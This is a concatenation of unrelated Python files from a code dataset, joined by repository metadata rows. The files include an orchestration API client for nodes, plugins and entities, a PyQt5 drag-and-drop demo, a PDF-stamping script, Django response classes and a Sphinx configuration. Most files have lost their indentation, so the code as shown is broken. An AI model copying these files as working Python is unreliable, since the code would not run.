uri = '{}/*'.format(self.store.aroot)
infos = self.store.actual.resolveAll(uri)
for i in infos:
if len(i[0].split('/')) == 4:
node_info = json.loads(i[1])
nodes.append((node_info.get('uuid'), node_info.get('name')))
return nodes
def info(self, node_uuid):
"""
Provide all information about a specific node
:param node_uuid: the uuid of the node you want info
:return: a dictionary with all information about the node
"""
if node_uuid is None:
return None
uri = '{}/{}'.format(self.store.aroot, node_uuid)
infos = self.store.actual.resolve(uri)
if infos is None:
return None
return json.loads(infos)
def plugins(self, node_uuid):
'''
            Get the list of plugins installed on the specified node
            :param node_uuid: the uuid of the node you want info
            :return: a list of the plugins installed in the node with detailed information
'''
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
response = self.store.actual.get(uri)
if response is not None:
return json.loads(response).get('plugins')
else:
return None
def search(self, search_dict):
'''
            Will search for a node that matches the information provided in the parameter
:param search_dict: dictionary contains all information to match
:return: a list of node matching the dictionary
'''
pass
class Plugin(object):
'''
This class encapsulates the commands for Plugin interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
            Add a plugin to a node or to all nodes in the system/tenant
            :param manifest: the dictionary representing the plugin manifest
:param node_uuid: optional the node in which add the plugin
:return: boolean
'''
manifest.update({'status':'add'})
plugins = {"plugins": [manifest]}
plugins = json.dumps(plugins).replace(' ', '')
if node_uuid is None:
uri = '{}/*/plugins'.format(self.store.droot)
else:
uri = '{}/{}/plugins'.format(self.store.droot, node_uuid)
res = self.store.desired.dput(uri, plugins)
if res:
return True
else:
return False
def remove(self, plugin_uuid, node_uuid=None):
'''
            Will remove a plugin from a node or from all nodes
:param plugin_uuid: the plugin you want to remove
:param node_uuid: optional the node that will remove the plugin
:return: boolean
'''
pass
def list(self, node_uuid=None):
'''
            Same as API.Node.plugins but can work for all nodes in the system; returns a dictionary with key node uuid and value the plugin list
:param node_uuid: can be none
:return: dictionary {node_uuid, plugin list }
'''
if node_uuid is not None:
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
response = self.store.actual.get(uri)
if response is not None:
return {node_uuid:json.loads(response).get('plugins')}
else:
return None
plugins = {}
uri = '{}/*/plugins'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
pl = json.loads(i[1]).get('plugins')
plugins.update({id: pl})
return plugins
def search(self, search_dict, node_uuid=None):
'''
Will search for a plugin matching the dictionary in a single node or in all nodes
:param search_dict: dictionary contains all information to match
:param node_uuid: optional node uuid in which search
:return: a dictionary with {node_uuid, plugin uuid list} with matches
'''
pass
class Network(object):
'''
This class encapsulates the command for Network element interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
            Add a network element to a node or to all nodes
            :param manifest: dictionary representing the manifest of that network element
            :param node_uuid: optional node uuid to which the network element is added
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is not None:
uri = '{}/{}/network/*/networks/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
else:
uri = '{}/*/network/*/networks/{}'.format(self.store.droot, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, net_uuid, node_uuid=None):
'''
            Remove a network element from one or all nodes
:param net_uuid: uuid of the network you want to remove
:param node_uuid: optional node from which remove the network element
:return: boolean
'''
if node_uuid is not None:
uri = '{}/{}/network/*/networks/{}'.format(self.store.droot, node_uuid, net_uuid)
else:
uri = '{}/*/network/*/networks/{}'.format(self.store.droot, net_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def list(self, node_uuid=None):
'''
            List all network elements available in the system/tenant or in a specified node
:param node_uuid: optional node uuid
:return: dictionary {node uuid: network element list}
'''
if node_uuid is not None:
n_list = []
uri = '{}/{}/network/*/networks/'.format(self.store.aroot, node_uuid)
response = self.store.actual.resolveAll(uri)
for i in response:
n_list.append(json.loads(i[1]))
return {node_uuid: n_list}
nets = {}
uri = '{}/*/network/*/networks/'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
net = json.loads(i[1])
net_list = nets.get(id, None)
if net_list is None:
net_list = []
net_list.append(net)
nets.update({id: net_list})
return nets
def search(self, search_dict, node_uuid=None):
'''
Will search for a network element matching the dictionary in a single node or in all nodes
:param search_dict: dictionary contains all information to match
:param node_uuid: optional node uuid in which search
:return: a dictionary with {node_uuid, network element uuid list} with matches
'''
pass
class Entity(object):
'''
This class encapsulates the api for interaction with entities
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def __search_plugin_by_name(self, name, node_uuid):
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
all_plugins = self.store.actual.get(uri)
if all_plugins is None or all_plugins == '':
print('Cannot get plugin')
return None
all_plugins = json.loads(all_plugins).get('plugins')
search = [x for x in all_plugins if name.upper() in x.get('name').upper()]
if len(search) == 0:
return None
else:
print("handler {}".format(search))
return search[0]
def __get_entity_handler_by_uuid(self, node_uuid, entity_uuid):
uri = '{}/{}/runtime/*/entity/{}'.format(self.store.aroot, node_uuid, entity_uuid)
all = self.store.actual.resolveAll(uri)
for i in all:
k = i[0]
if fnmatch.fnmatch(k, uri):
# print('MATCH {0}'.format(k))
# print('Extracting uuid...')
regex = uri.replace('/', '\/')
regex = regex.replace('*', '(.*)')
reobj = re.compile(regex)
mobj = reobj.match(k)
uuid = mobj.group(1)
# print('UUID {0}'.format(uuid))
print("handler {}".format(uuid))
return uuid
def __get_entity_handler_by_type(self, node_uuid, t):
handler = None
handler = self.__search_plugin_by_name(t, node_uuid)
if handler is None:
print('type not yet supported')
print("handler {}".format(handler))
return handler
def __wait_atomic_entity_state_change(self, node_uuid, handler_uuid, entity_uuid, state):
while True:
time.sleep(1)
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.aroot, node_uuid, handler_uuid, entity_uuid)
data = self.store.actual.get(uri)
if data is not None:
entity_info = json.loads(data)
if entity_info is not None and entity_info.get('status') == state:
return
def __wait_atomic_entity_instance_state_change(self, node_uuid, handler_uuid, entity_uuid, instance_uuid, state):
while True:
time.sleep(1)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.aroot, node_uuid, handler_uuid, entity_uuid, instance_uuid)
data = self.store.actual.get(uri)
if data is not None:
entity_info = json.loads(data)
if entity_info is not None and entity_info.get('status') == state:
return
def add(self, manifest, node_uuid=None, wait=False):
'''
define, configure and run an entity all in one shot
:param manifest: manifest rapresenting the entity
:param node_uuid: optional uuid of the node in which the entity will be added
:param wait: flag for wait that everything is started before returing
:return: the instance uuid
'''
pass
def remove(self, entity_uuid, node_uuid=None, wait=False):
'''
stop, clean and undefine entity all in one shot
:param entity_uuid:
:param node_uuid:
:param wait:
:return: the instance uuid
'''
pass
def define(self, manifest, node_uuid, wait=False):
'''
            Defines an atomic entity in a node; this method checks the manifest before sending the definition to the node
            :param manifest: dictionary representing the atomic entity manifest
            :param node_uuid: destination node uuid
            :param wait: whether to wait for the definition to complete before returning
:return: boolean
'''
manifest.update({'status': 'define'})
handler = None
t = manifest.get('type')
try:
if t in ['kvm', 'xen']:
handler = self.__search_plugin_by_name(t, node_uuid)
validate(manifest.get('entity_data'), Schemas.vm_schema)
elif t in ['container', 'lxd']:
handler = self.__search_plugin_by_name(t, node_uuid)
validate(manifest.get('entity_data'), Schemas.container_schema)
elif t == 'native':
handler = self.__search_plugin_by_name('native', node_uuid)
validate(manifest.get('entity_data'), Schemas.native_schema)
elif t == 'ros2':
handler = self.__search_plugin_by_name('ros2', node_uuid)
validate(manifest.get('entity_data'), Schemas.ros2_schema)
elif t == 'usvc':
print('microservice not yet')
else:
print('type not recognized')
if handler is None:
return False
except ValidationError as ve:
print("Error in manifest {}".format(ve))
return False
entity_uuid = manifest.get('uuid')
entity_definition = manifest
json_data = json.dumps(entity_definition).replace(' ', '')
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.droot, node_uuid, handler.get('uuid'), entity_uuid)
res = self.store.desired.put(uri, json_data)
if res:
if wait:
self.__wait_atomic_entity_state_change(node_uuid,handler.get('uuid'), entity_uuid, 'defined')
return True
else:
return False
def undefine(self, entity_uuid, node_uuid, wait=False):
'''
            This method undefines an atomic entity in a node
            :param entity_uuid: atomic entity you want to undefine
            :param node_uuid: destination node
            :param wait: whether to wait until the entity is undefined before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.droot, node_uuid, handler, entity_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def configure(self, entity_uuid, node_uuid, instance_uuid=None, wait=False):
'''
            Configure an atomic entity, creating the instance
            :param entity_uuid: entity you want to configure
            :param node_uuid: destination node
            :param instance_uuid: optional; if present, that uuid is used for the atomic entity instance, otherwise a new one is generated
            :param wait: optional wait before returning
            :return: instance uuid or None in case of error
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
if instance_uuid is None:
instance_uuid = '{}'.format(uuid.uuid4())
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=configure'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'configured')
return instance_uuid
else:
return None
def clean(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Clean an atomic entity instance, this will destroy the instance
:param entity_uuid: entity for which you want to clean an instance
            :param node_uuid: destination node
:param instance_uuid: instance you want to clean
:param wait: optional wait before returning
:return: boolean
'''
            handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
            uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def run(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
            Start an atomic entity instance
:param entity_uuid: entity for which you want to run the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to start
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=run'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'run')
return True
else:
return False
def stop(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Shutting down an atomic entity instance
:param entity_uuid: entity for which you want to shutdown the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to shutdown
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=stop'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'stop')
return True
else:
return False
def pause(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
            Pause the execution of an atomic entity instance
:param entity_uuid: entity for which you want to pause the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to pause
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=pause'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'pause')
return True
else:
return False
def resume(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
            Resume the execution of an atomic entity instance
:param entity_uuid: entity for which you want to resume the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to resume
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=resume'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'run')
return True
else:
return False
def migrate(self, entity_uuid, instance_uuid, node_uuid, destination_node_uuid, wait=False):
'''
Live migrate an atomic entity instance between two nodes
            The migration is issued when this command is sent; there is a small overhead for the copy of the base image and the disk image
            :param entity_uuid: entity for which you want to migrate the instance
:param instance_uuid: instance you want to migrate
:param node_uuid: source node for the instance
:param destination_node_uuid: destination node for the instance
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.aroot, node_uuid, handler, entity_uuid, instance_uuid)
entity_info = self.store.actual.get(uri)
if entity_info is None:
return False
entity_info = json.loads(entity_info)
entity_info_src = entity_info.copy()
entity_info_dst = entity_info.copy()
entity_info_src.update({"status": "taking_off"})
entity_info_src.update({"dst": destination_node_uuid})
entity_info_dst.update({"status": "landing"})
entity_info_dst.update({"dst": destination_node_uuid})
destination_handler = self.__get_entity_handler_by_type(destination_node_uuid, entity_info_dst.get('type'))
if destination_handler is None:
return False
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.droot, destination_node_uuid, destination_handler.get('uuid'), entity_uuid, instance_uuid)
res = self.store.desired.put(uri, json.dumps(entity_info_dst).replace(' ', ''))
if res:
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
                res_dest = self.store.desired.dput(uri, json.dumps(entity_info_src).replace(' ', ''))
if res_dest:
if wait:
self.__wait_atomic_entity_instance_state_change(destination_node_uuid, destination_handler.get('uuid'), entity_uuid, instance_uuid, 'run')
return True
else:
print("Error on destination node")
return False
else:
print("Error on source node")
return False
def search(self, search_dict, node_uuid=None):
pass
class Image(object):
'''
This class encapsulates the action on images
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Adding an image to a node or to all nodes
:param manifest: dictionary representing the manifest for the image
            :param node_uuid: optional node to which the image will be added
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is None:
uri = '{}/*/runtime/*/image/{}'.format(self.store.droot, manifest.get('uuid'))
else:
uri = '{}/{}/runtime/*/image/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, image_uuid, node_uuid=None):
'''
            Remove an image from a node or from all nodes
            :param image_uuid: image you want to remove
            :param node_uuid: optional node from which to remove the image
:return: boolean
'''
if node_uuid is None:
uri = '{}/*/runtime/*/image/{}'.format(self.store.droot, image_uuid)
else:
uri = '{}/{}/runtime/*/image/{}'.format(self.store.droot, node_uuid, image_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def search(self, search_dict, node_uuid=None):
pass
class Flavor(object):
'''
This class encapsulates the action on flavors
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Add a computing flavor to a node or all nodes
:param manifest: dictionary representing the manifest for the flavor
            :param node_uuid: optional node to which the flavor will be added
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is None:
uri = '{}/*/runtime/*/flavor/{}'.format(self.store.droot, manifest.get('uuid'))
else:
uri = '{}/{}/runtime/*/flavor/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, flavor_uuid, node_uuid=None):
'''
Remove a flavor from all nodes or a specified node
:param flavor_uuid: flavor to remove
:param node_uuid: optional node from which remove the flavor
:return: boolean
'''
if node_uuid is None:
uri = '{}/*/runtime/*/flavor/{}'.format(self.store.droot, flavor_uuid)
else:
uri = '{}/{}/runtime/*/flavor/{}'.format(self.store.droot, node_uuid, flavor_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def search(self, search_dict, node_uuid=None):
pass
def list(self, node_uuid=None):
'''
            List all flavors available in the system/tenant or in a specified node
            :param node_uuid: optional node uuid
            :return: dictionary {node uuid: flavor list}
'''
if node_uuid is not None:
f_list = []
uri = '{}/{}/runtime/*/flavor/'.format(self.store.aroot, node_uuid)
response = self.store.actual.resolveAll(uri)
for i in response:
f_list.append(json.loads(i[1]))
return {node_uuid: f_list}
flavs = {}
uri = '{}/*/runtime/*/flavor/'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
net = json.loads(i[1])
flavs_list = flavs.get(id, None)
if flavs_list is None:
flavs_list = []
flavs_list.append(net)
flavs.update({id: flavs_list})
return flavs
'''
Methods
- manifest
-check
- node
- list
- info
- plugins
- search
- plugin
- add
- remove
- info
- list
- search
- network
- add
- remove
- list
- search
- entity
- add
- remove
- define
- undefine
- configure
- clean
- run
- stop
- pause
- resume
- migrate
- search
- images
- add
- remove
- search
- flavor
- add
- remove
- search
'''
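# Minimal usage sketch (host, port, manifest and uuids below are placeholders, not real values):
#   api = WebAPI('127.0.0.1', 8080)
#   nodes = api.node.list()                                   # [(node_uuid, hostname), ...]
#   node_uuid = nodes[0][0]
#   if api.entity.define(my_manifest, node_uuid, wait=True):
#       instance_uuid = api.entity.configure(my_manifest['uuid'], node_uuid, wait=True)
#       api.entity.run(my_manifest['uuid'], node_uuid, instance_uuid, wait=True)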
| [
"[email protected]"
]
| |
67269e55398033362ab23e10f0576fc5aeae98ab | 2e1b5bd2d33f0beb965be77f1de2ae035c491125 | /chapter4/qt04_drag.py | f30b52e75694194da80bf8c948af65dfb20391a1 | []
| no_license | mandeling/PyQt5-1 | 1cf6778e767e5746640aa0458434751a226a2383 | 9334786e70b2657e0f94b6dad4714f2aa239d0cd | refs/heads/master | 2020-05-07T19:08:40.072960 | 2019-04-11T10:44:48 | 2019-04-11T10:44:48 | 180,799,901 | 1 | 0 | null | 2019-04-11T13:37:55 | 2019-04-11T13:37:55 | null | UTF-8 | Python | false | false | 887 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class Combo(QComboBox):
def __init__(self, title, parent):
super(Combo, self).__init__(parent)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
print(e)
if e.mimeData().hasText():
e.accept()
else:
e.ignore()
def dropEvent(self, e):
self.addItem(e.mimeData().text())
class Example(QWidget):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
lo = QFormLayout()
        lo.addRow(QLabel('Drag the text on the left into the drop-down menu on the right'))
edit = QLineEdit()
edit.setDragEnabled(True)
com = Combo('Button', self)
lo.addRow(edit, com)
self.setLayout(lo)
        self.setWindowTitle('Simple drag-and-drop example')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec())
| [
"[email protected]"
]
| |
c33c5d21ce909bc806b78c0dde5a40c39d15fbd5 | 00d7e9321d418a2d9a607fb9376b862119f2bd4e | /utils/pdf_figure_stamper.py | 4628dbee41fd552c97249ac0bbeb5cd6de0b08e4 | [
"MIT"
]
| permissive | baluneboy/pims | 92b9b1f64ed658867186e44b92526867696e1923 | 5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13 | refs/heads/master | 2021-11-16T01:55:39.223910 | 2021-08-13T15:19:48 | 2021-08-13T15:19:48 | 33,029,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | #!/usr/bin/env python
import os
from pims.files.pdfs.pdfjam import CpdfAddTextCommand
from pims.files.utils import listdir_filename_pattern
# return list of PDF files matching filename pattern criteria (not having STAMPED in filename)
def get_pdf_files(dirpath, fname_pat):
"""return list of PDF files for this drop number (i.e. drop dir)"""
tmp_list = listdir_filename_pattern(dirpath, fname_pat)
# filter tmp_list to ignore previous run's _cpdf_ filenames
return [ x for x in tmp_list if "STAMPED" not in x ]
if __name__ == "__main__":
# get list of analysis template plot PDFs
sensor = '121f02'
sensor_suffix = '010'
fname_pat = '.*' + sensor + sensor_suffix + '_gvtm_pops_.*_EML_analysis.pdf'
dirpath = '/home/pims/dev/matlab/programs/special/EML/hb_vib_crew_Vehicle_and_Crew_Activity/plots'
pdf_files = sorted(get_pdf_files(dirpath, fname_pat))
c = 0
for f in pdf_files:
c += 1
print 'page %02d %s' % (c, f)
#cpdf -prerotate -add-text "${F}" ${F} -color "0.5 0.3 0.4" -font-size 6 -font "Courier" -pos-left "450 5" -o ${F/.pdf/_cpdf_add-text.pdf}
color = "0.5 0.3 0.4"
font = "Courier"
font_size = 6
pos_left = "450 5"
cat = CpdfAddTextCommand(f, color, font, font_size, pos_left)
cat.run()
| [
"[email protected]"
]
| |
116c66d9f3c1b4f5e2c4991742de3a8413bbff56 | 854b220c25dc886f77c237437c370782a68c8bb2 | /proyectos_de_ley/api/api_responses.py | f94452466a9934b2e9df3b1b8c8aaa98a4e6592c | [
"MIT"
]
| permissive | MrBaatezu/proyectos_de_ley | b6bb672b5bcc3c8ca2b6327ee96083466356560d | 56cf6f2f1df6483d2057235132a376b068877407 | refs/heads/master | 2021-01-18T01:10:12.683082 | 2015-10-29T00:44:52 | 2015-10-29T00:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | from django.http import HttpResponse
from rest_framework.renderers import JSONRenderer
from rest_framework_csv import renderers
class JSONResponse(HttpResponse):
"""
An HttpResponse that renders its content into JSON.
"""
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class CSVResponse(HttpResponse):
"""
An HttpResponse that renders its content into CSV.
"""
def __init__(self, data, **kwargs):
content = CSVRenderer().render(data)
kwargs['content_type'] = 'text/csv'
super(CSVResponse, self).__init__(content, **kwargs)
class CSVRenderer(renderers.CSVRenderer):
media_type = 'text/csv'
format = 'csv'
def render(self, data, media_type=None, renderer_context=None):
return super(CSVRenderer, self).render(data, media_type, renderer_context)
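# Illustrative view usage (Project and ProjectSerializer are placeholders for real models/serializers):
#   def project_list(request):
#       data = ProjectSerializer(Project.objects.all(), many=True).data
#       if request.GET.get('format') == 'csv':
#           return CSVResponse(data)
#       return JSONResponse(data)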
| [
"[email protected]"
]
| |
8c2611ad5852420460e9005177ed6e1296572354 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/a01.py | d912fcfad8c297d61001f2e370b33ba78e5a3e2d | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'a01':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
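# Example source line this interpreter accepts (the quote characters must be separate tokens):
#   a01 " hello world "
# which prints: hello world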
"[email protected]"
]
| |
efecd6e8598ad283a82bc7fe6aab0b6dec4ceea3 | 5c333d9afed7ecf1feba34c41764184b70f725ea | /scripts/test.py | 22d789f0c247add83cb748c9a559e96f2bcd14b5 | []
| no_license | NMGRL/pychrondata | 4e3573f929b6a465fa959bfe5b5bdfe734514b8c | 0d805ca6b7e5377f253d80ad93749b1d4253cb50 | refs/heads/master | 2020-12-24T16:35:39.308745 | 2016-03-09T18:37:47 | 2016-03-09T18:37:47 | 15,424,677 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #!Extraction
def main():
'''
start at 0 zoom
focus
take picture
increment zoom
take picture
start at 100 zoom
focus
take picture....
'''
for i in range(10):
info('info {}'.format(i))
| [
"[email protected]"
]
| |
16d51e454824f67b4b41ef3ca55f13c9e221bf28 | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/ajob_subsequence_bis.py | 71a54d19dcac4f7ce8161b46f701309c0454498c | []
| no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #!/usr/bin/env python3
# cf ajob_subsequence.py
# Method 2: using Lucas's theorem
def digits(n):
D = []
while n:
n,d = divmod(n,P)
D.append(d)
return D
def inv(n):
return pow(n,P-2,P)
def binom(n,p):
if 0<=p<=n:
return (Fact[n] * inv((Fact[p]*Fact[n-p])%P)) % P
return 0
def binom_lucas(n,k):
assert 0<=k<=n
Dn = digits(n)
Dk = digits(k)
while len(Dk)<len(Dn):
Dk.append(0)
res = 1
for ni,ki in zip(Dn,Dk):
res = (res * binom(ni,ki)) % P
return res
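# Worked example (P must be prime and Fact must be precomputed mod P, as done in the __main__ block below):
#   with P = 3, C(7, 3) mod 3: digits(7) = [1, 2] and digits(3) = [0, 1] (least significant first),
#   so the result is binom(1, 0) * binom(2, 1) = 1 * 2 = 2, which matches 35 mod 3 = 2.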
if __name__=='__main__':
T = int(input())
for _ in range(T):
N,K,P = map(int,input().split())
Fact = [1]*P
for i in range(2,P):
Fact[i] = (Fact[i-1]*i) % P
print(binom_lucas(N+1,K+1))
| [
"[email protected]"
]
| |
1eb2f715857b7860d37606c858a8ac2c834a2f58 | 87fb0ae5563512bf4cfe2754ea92e7f4173f753f | /Chap_08/Ex_181.py | ba2d1b32e7dabdca85b694f6e4635d4a64b0e168 | []
| no_license | effedib/the-python-workbook-2 | 87291f5dd6d369360288761c87dc47df1b201aa7 | 69532770e6bbb50ea507e15f7d717028acc86a40 | refs/heads/main | 2023-08-21T13:43:59.922037 | 2021-10-12T20:36:41 | 2021-10-12T20:36:41 | 325,384,405 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | # Possible Change
# Read both the dollar amount and the number of coins from user and display a message indicating whether or not the
# entered amount can be formed using the number of coins indicated.
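# For instance, $0.06 can be formed with exactly 2 coins (a nickel and a penny),
# while $0.15 cannot be formed with exactly 1 coin (there is no 15-cent piece).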
def possibleChange(dollars, coins, index=0):
coins_list = [0.25, 0.10, 0.05, 0.01]
dollars = round(dollars, 2)
if dollars == 0 and coins == 0:
return True
elif index >= len(coins_list):
return False
print("index '{:.2f}'\t{:.2f} dollars\t{:.2f} coins".format(coins_list[index], dollars, coins))
if dollars == 0 or coins == 0:
dollars += coins_list[index]
coins += 1
index += 1
return possibleChange(dollars, coins, index)
elif (dollars / coins) in coins_list:
return True
else:
if dollars >= coins_list[index]:
dollars -= coins_list[index]
coins -= 1
else:
index += 1
return possibleChange(dollars, coins, index)
def main():
total = float(input('Enter the total amount: '))
coin = int(input('How many coins do you want to use? '))
for i in range(1, (coin+1)):
print("{} coins:\t{}".format(coin, possibleChange(total, coin)))
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
a9cd81676f816e00ef69cf3442787107109adc24 | 7834e7a48399b156401ea62c0c6d2de80ad421f5 | /docs/sphinx/conf.py | 6a6e8b3e6216ce0aa57a8b196300a395552f700e | [
"MIT"
]
| permissive | vojnovski/pysparkling | b9758942aba0d068f6c51797c8fb491cf59c3401 | 21b36464371f121dc7963dac09d300e7235f587e | refs/heads/master | 2020-04-08T18:33:55.707209 | 2016-07-27T15:12:59 | 2016-07-27T15:12:59 | 62,555,929 | 0 | 0 | null | 2016-07-04T11:06:18 | 2016-07-04T11:06:18 | null | UTF-8 | Python | false | false | 10,067 | py | # -*- coding: utf-8 -*-
#
# pysparkling documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 7 12:37:20 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import sphinx_rtd_theme
# extract version from __init__.py
pysparkling_init_filename = os.path.join(
os.path.dirname(__file__),
'..',
'..',
'pysparkling',
'__init__.py',
)
with open(pysparkling_init_filename, 'r') as f:
version_line = [l for l in f if l.startswith('__version__')][0]
PYSPARKLING_VERSION = version_line.split('=')[1].strip()[1:-1]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
